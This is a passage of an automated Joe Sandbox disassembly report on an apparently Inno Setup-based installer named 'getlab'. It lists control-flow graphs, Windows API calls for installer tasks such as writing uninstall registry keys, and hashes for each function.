2683->2737 2738 46873d-468760 call 42a038 call 40b434 2683->2738 2684->2683 2685->2683 2694 468637-46863b 2685->2694 2739 4685ec-4685f0 2691->2739 2692->2739 2705 46863d-468653 call 40b434 2694->2705 2734 468686-46868a 2705->2734 2735 468655-468681 call 42a054 call 469824 call 4696c4 2705->2735 2706->2683 2707->2683 2712->2713 2725 46848c-46849e call 406ab4 2712->2725 2713->2644 2713->2652 2723->2651 2723->2680 2724->2651 2725->2713 2748 4684a0-4684aa 2725->2748 2734->2705 2740 46868c 2734->2740 2735->2683 2749 46879c-4687bb call 414a3c 2737->2749 2763 468762-468769 2738->2763 2764 46876b-46877a call 414a3c 2738->2764 2746 4685f2-4685f9 2739->2746 2747 4685fb-4685fd 2739->2747 2740->2683 2746->2747 2753 468604-468608 2746->2753 2747->2753 2748->2713 2754 4684ac 2748->2754 2765 4687e5-468808 call 47bb50 call 403450 2749->2765 2766 4687bd-4687e0 call 42a038 call 469984 2749->2766 2753->2662 2753->2663 2754->2713 2763->2764 2769 46877c-46878b call 414a3c 2763->2769 2764->2749 2782 468824-46882d 2765->2782 2783 46880a-468813 2765->2783 2766->2765 2769->2749 2785 468843-468853 call 403494 2782->2785 2786 46882f-468841 call 403684 2782->2786 2783->2782 2784 468815-468822 call 47bcf0 2783->2784 2793 468865-46887c call 414b10 2784->2793 2785->2793 2786->2785 2794 468855-468860 call 403494 2786->2794 2798 4688b2-4688bc call 414a3c 2793->2798 2799 46887e-468885 2793->2799 2794->2793 2805 4688c1-4688e6 call 403400 * 3 2798->2805 2800 468887-468890 2799->2800 2801 468892-46889c call 42b0dc 2799->2801 2800->2801 2803 4688a1-4688b0 call 414a3c 2800->2803 2801->2803 2803->2805
                                                                          APIs
                                                                            • Part of subcall function 00494DD8: GetWindowRect.USER32(00000000), ref: 00494DEE
                                                                          • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 0046759B
                                                                            • Part of subcall function 0041D6A8: GetObjectA.GDI32(?,00000018,004675B5), ref: 0041D6D3
                                                                            • Part of subcall function 00466FA8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046704B
                                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467071
                                                                            • Part of subcall function 00466FA8: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004670C8
                                                                            • Part of subcall function 00466968: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467650,00000000,00000000,00000000,0000000C,00000000), ref: 00466980
                                                                            • Part of subcall function 0049505C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495066
                                                                            • Part of subcall function 0042ED30: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                            • Part of subcall function 0042ED30: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                            • Part of subcall function 00494D28: 73A1A570.USER32(00000000,?,?,?), ref: 00494D4A
                                                                            • Part of subcall function 00494D28: SelectObject.GDI32(?,00000000), ref: 00494D70
                                                                            • Part of subcall function 00494D28: 73A1A480.USER32(00000000,?,00494DCE,00494DC7,?,00000000,?,?,?), ref: 00494DC1
                                                                            • Part of subcall function 0049504C: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495056
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0216FB00,02171860,?,?,02171890,?,?,021718E0,?), ref: 00468225
                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00468236
                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0046824E
                                                                            • Part of subcall function 0042A054: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A06A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                          • String ID: $(Default)$STOPIMAGE
                                                                          • API String ID: 3271511185-770201673
                                                                          • Opcode ID: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                          • Instruction ID: b2f63b4b9f8df581d735fd8ef5c85857eef1c350e3dafc85bc3b179d47d789c4
                                                                          • Opcode Fuzzy Hash: 65c14ae30e85822ef60db02fd97b7f4e3efbe6cb128918b96e9feeb284152913
                                                                          • Instruction Fuzzy Hash: FCF2D6387005148FCB00EB69D9D5F9973F1BF49304F1582BAE9049B36ADB74AC46CB9A
                                                                          Function 00474D70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                                          • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: unins$unins???.*
                                                                          • API String ID: 3541575487-1009660736
                                                                          • Opcode ID: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                          • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                                          • Opcode Fuzzy Hash: 93e32e2715b3a8b7847a0fb832790e1c3976f33889ea765eaf668e4b41fda757
                                                                          • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                                          Function 00452A34 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                                          • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileFindFirstLast
                                                                          • String ID:
                                                                          • API String ID: 873889042-0
                                                                          • Opcode ID: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                          • Instruction ID: 4713bb530a1d6cf0c1be7e5c5fdd45c253cc675fccbb574d3c3c9d841926f9e3
                                                                          • Opcode Fuzzy Hash: 7ae0723ade0fcfbd8a40aeca515459a75bb89ca97a3748738d7edfd6ae7cd884
                                                                          • Instruction Fuzzy Hash: 44F0F971A04704AB8B21DFA69D4149EB7ACEB86725B5046BBFC14E3282DAB84E054558
                                                                          Function 0046DF04 Relevance: 3.0, APIs: 2, Instructions: 28comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersion.KERNEL32(000003E9,0046DF9A), ref: 0046DF0E
                                                                          • CoCreateInstance.OLE32(00499B84,00000000,00000001,00499B94,?,000003E9,0046DF9A), ref: 0046DF2A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstanceVersion
                                                                          • String ID:
                                                                          • API String ID: 1462612201-0
                                                                          • Opcode ID: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                          • Instruction ID: 830c4b43a8f201c084d489d1d0538b8be171f1220f730b3634288a605713aaeb
                                                                          • Opcode Fuzzy Hash: 5a8033094c1a2ccd5f304b9bf5dd1a9c70433978345ec92e95cfd2b7b8fd1860
                                                                          • Instruction Fuzzy Hash: 08F0A031B853009EEB14E7A9DC46B4A37C0BB65328F4000BBF044972D2E3AC8890875F
                                                                          Function 00408558 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                          • Instruction ID: c2e77f62f7768c8d819fe5e4f890f04d0c30465c7a0250885ae4f210fddfc08b
                                                                          • Opcode Fuzzy Hash: 13731be40deedddb1bcfa8ff428b7afeb94bbc36fd170698d9f0ebbe8ddb7d61
                                                                          • Instruction Fuzzy Hash: 9BE0927170021466D311A96A9C86AEAB35C975C314F00427FBA84E73C2EDB89E4146A9
                                                                          Function 00423B7C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424149,?,00000000,00424154), ref: 00423BA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                          • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                          • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                          • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                          Function 00455570 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          • Opcode ID: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                          • Instruction ID: 76bfcf8d2b29e22e6d76dcded3dafddf5190573ba102c834aba1eed314c6e9aa
                                                                          • Opcode Fuzzy Hash: 1f1a34a7eb901b06f0a61d7cce650584f8c9fe2765f86e1b2240f6bc1b6117e3
                                                                          • Instruction Fuzzy Hash: C9D0C27130460467C700AA68DC825AA358E8B84306F00483E3CC5DA2C3FABDDA485756
                                                                          Function 0042F518 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F534
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: NtdllProc_Window
                                                                          • String ID:
                                                                          • API String ID: 4255912815-0
                                                                          • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                          • Instruction ID: dfc14921be52f7ae21963fbc3fbcd64f7f6a072f88f97ccbdbccca1c2d2fc057
                                                                          • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                          • Instruction Fuzzy Hash: 9FD09E7220011DBB9B00DE99E840C6B73ADAB88710BD09926F945C7642D634ED9197A5
                                                                          Function 0046EE78 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 500registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 46ee78-46eeaa 407 46eec7 406->407 408 46eeac-46eeb3 406->408 411 46eece-46ef06 call 403634 call 403738 call 42deb8 407->411 409 46eeb5-46eebc 408->409 410 46eebe-46eec5 408->410 409->407 409->410 410->411 418 46ef21-46ef4a call 403738 call 42dddc 411->418 419 46ef08-46ef1c call 403738 call 42deb8 411->419 427 46ef4c-46ef55 call 46eb48 418->427 428 46ef5a-46ef83 call 46ec64 418->428 419->418 427->428 432 46ef95-46ef98 call 403400 428->432 433 46ef85-46ef93 call 403494 428->433 437 46ef9d-46efe8 call 46ec64 call 42c3f4 call 46ecac call 46ec64 432->437 433->437 446 46effe-46f01f call 455570 call 46ec64 437->446 447 46efea-46effd call 46ecd4 437->447 454 46f075-46f07c 446->454 455 46f021-46f074 call 46ec64 call 4313fc call 46ec64 call 4313fc call 46ec64 446->455 447->446 456 46f07e-46f0bb call 4313fc call 46ec64 call 4313fc call 46ec64 454->456 457 46f0bc-46f0c3 454->457 455->454 456->457 461 46f104-46f129 call 40b434 call 46ec64 457->461 462 46f0c5-46f103 call 46ec64 * 3 457->462 481 46f12b-46f136 call 47bb50 461->481 482 46f138-46f141 call 403494 461->482 462->461 492 46f146-46f151 call 478898 481->492 482->492 496 46f153-46f158 492->496 497 46f15a 492->497 498 46f15f-46f329 call 403778 call 46ec64 call 47bb50 call 46ecac call 403494 call 40357c * 2 call 46ec64 call 403494 call 40357c * 2 call 46ec64 call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 call 46ecac call 47bb50 496->498 497->498 561 46f33f-46f34d call 46ecd4 498->561 562 46f32b-46f33d call 46ec64 498->562 566 46f352 561->566 567 46f353-46f39c call 46ecd4 call 46ed08 call 46ec64 call 47bb50 call 46ed6c 562->567 566->567 578 46f3c2-46f3cf 567->578 579 46f39e-46f3c1 call 46ecd4 * 2 567->579 581 46f3d5-46f3dc 578->581 582 46f49e-46f4a5 578->582 579->578 586 46f3de-46f3e5 581->586 587 46f449-46f458 581->587 583 46f4a7-46f4dd call 4941f8 582->583 584 46f4ff-46f515 RegCloseKey 582->584 583->584 586->587 591 46f3e7-46f40b call 430bc4 586->591 590 46f45b-46f468 587->590 594 46f47f-46f498 call 430c00 call 46ecd4 590->594 595 46f46a-46f477 590->595 591->590 601 46f40d-46f40e 591->601 604 46f49d 594->604 595->594 597 46f479-46f47d 595->597 597->582 597->594 603 46f410-46f436 call 40b434 call 4790c4 601->603 609 46f443-46f445 603->609 610 46f438-46f43e call 430bc4 603->610 604->582 609->603 612 46f447 609->612 610->609 612->590
                                                                          APIs
                                                                            • Part of subcall function 0046EC64: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                            • Part of subcall function 0046ECD4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F352,?,?,00000000,0046F516,?,_is1,?), ref: 0046ECE7
                                                                          • RegCloseKey.ADVAPI32(?,0046F51D,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F568,?,?,0049C1D0,00000000), ref: 0046F510
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Close
                                                                          • String ID: " /SILENT$5.5.1 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                          • API String ID: 3391052094-213252641
                                                                          • Opcode ID: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                                          • Instruction ID: b1500e3f1927c4d0668730226bdd95c12c24136f653289305a03eef3c2fa698f
                                                                          • Opcode Fuzzy Hash: db2c8a7a7111b7a2256de2528cb94e5858c2f33c6448f5c94e9fc589d623ae97
                                                                          • Instruction Fuzzy Hash: 40125334A001089BDB04EF56E991ADE73F5FB48304F60807BE8506B765EB78BD45CB5A
                                                                          Function 00491D44 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1027 491d44-491d78 call 403684 1030 491d7a-491d89 call 446f94 Sleep 1027->1030 1031 491d8e-491d9b call 403684 1027->1031 1036 49221e-492238 call 403420 1030->1036 1037 491dca-491dd7 call 403684 1031->1037 1038 491d9d-491dc0 call 446ff0 call 403738 FindWindowA call 447270 1031->1038 1046 491dd9-491e01 call 446ff0 call 403738 FindWindowA call 447270 1037->1046 1047 491e06-491e13 call 403684 1037->1047 1057 491dc5 1038->1057 1046->1036 1055 491e5c-491e69 call 403684 1047->1055 1056 491e15-491e57 call 446f94 * 4 SendMessageA call 447270 1047->1056 1065 491eb8-491ec5 call 403684 1055->1065 1066 491e6b-491eb3 call 446f94 * 4 PostMessageA call 4470c8 1055->1066 1056->1036 1057->1036 1074 491f14-491f21 call 403684 1065->1074 1075 491ec7-491f0f call 446f94 * 4 SendNotifyMessageA call 4470c8 1065->1075 1066->1036 1087 491f4e-491f5b call 403684 1074->1087 1088 491f23-491f49 call 446ff0 call 403738 RegisterClipboardFormatA call 447270 1074->1088 1075->1036 1102 491f5d-491f97 call 446f94 * 3 SendMessageA call 447270 1087->1102 1103 491f9c-491fa9 call 403684 1087->1103 1088->1036 1102->1036 1115 491fab-491feb call 446f94 * 3 PostMessageA call 4470c8 1103->1115 1116 491ff0-491ffd call 403684 1103->1116 1115->1036 1127 491fff-49203f call 446f94 * 3 SendNotifyMessageA call 4470c8 1116->1127 1128 492044-492051 call 403684 1116->1128 1127->1036 1138 492053-492071 call 446ff0 call 42e38c 1128->1138 1139 4920a6-4920b3 call 403684 1128->1139 1159 492083-492091 GetLastError call 447270 1138->1159 1160 492073-492081 call 447270 1138->1160 1150 49212d-49213a call 403684 1139->1150 1151 4920b5-4920e1 call 446ff0 call 403738 call 446f94 GetProcAddress 1139->1151 1165 49213c-49215d call 446f94 FreeLibrary call 4470c8 1150->1165 1166 492162-49216f call 403684 1150->1166 1184 49211d-492128 call 4470c8 1151->1184 1185 4920e3-492118 call 446f94 * 2 call 447270 call 4470c8 1151->1185 1171 492096-4920a1 call 447270 1159->1171 1160->1171 1165->1036 1177 492171-49218f call 446ff0 call 403738 CreateMutexA 1166->1177 1178 492194-4921a1 call 403684 1166->1178 1171->1036 1177->1036 1193 4921a3-4921d5 call 48c174 call 403574 call 403738 OemToCharBuffA call 48c18c 1178->1193 1194 4921d7-4921e4 call 403684 1178->1194 1184->1036 1185->1036 1193->1036 1203 49221a 1194->1203 1204 4921e6-492218 call 48c174 call 403574 call 403738 CharToOemBuffA call 48c18c 1194->1204 1203->1036 1204->1036
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,00000000,00492239,?,?,?,?,00000000,00000000,00000000), ref: 00491D84
                                                                          • FindWindowA.USER32(00000000,00000000), ref: 00491DB5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FindSleepWindow
                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                          • API String ID: 3078808852-3310373309
                                                                          • Opcode ID: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                          • Instruction ID: dc8cd37179c6c7efec8ae072485b7dd58185b77a9baa1073e2e80a3326dd0ce5
                                                                          • Opcode Fuzzy Hash: 58a090b98d9e381863c78da40cb00c9745695e2105e43b1ea83f897cb27ba63d
                                                                          • Instruction Fuzzy Hash: 6CC19360B043406BDB24BF7E9D4291A59999F98708711897FB846EB38BCE7CDC0E439D
                                                                          Function 00483038 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1589 483038-48305d GetModuleHandleA GetProcAddress 1590 48305f-483075 GetNativeSystemInfo GetProcAddress 1589->1590 1591 4830c4-4830c9 GetSystemInfo 1589->1591 1592 4830ce-4830d7 1590->1592 1593 483077-483082 GetCurrentProcess 1590->1593 1591->1592 1594 4830d9-4830dd 1592->1594 1595 4830e7-4830ee 1592->1595 1593->1592 1602 483084-483088 1593->1602 1596 4830df-4830e3 1594->1596 1597 4830f0-4830f7 1594->1597 1598 483109-48310e 1595->1598 1600 4830f9-483100 1596->1600 1601 4830e5-483102 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1603 48308a-483091 call 4526f0 1602->1603 1603->1592 1607 483093-4830a0 GetProcAddress 1603->1607 1607->1592 1608 4830a2-4830b9 GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 4830bb-4830c2 1608->1609 1609->1592
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483049
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483056
                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483064
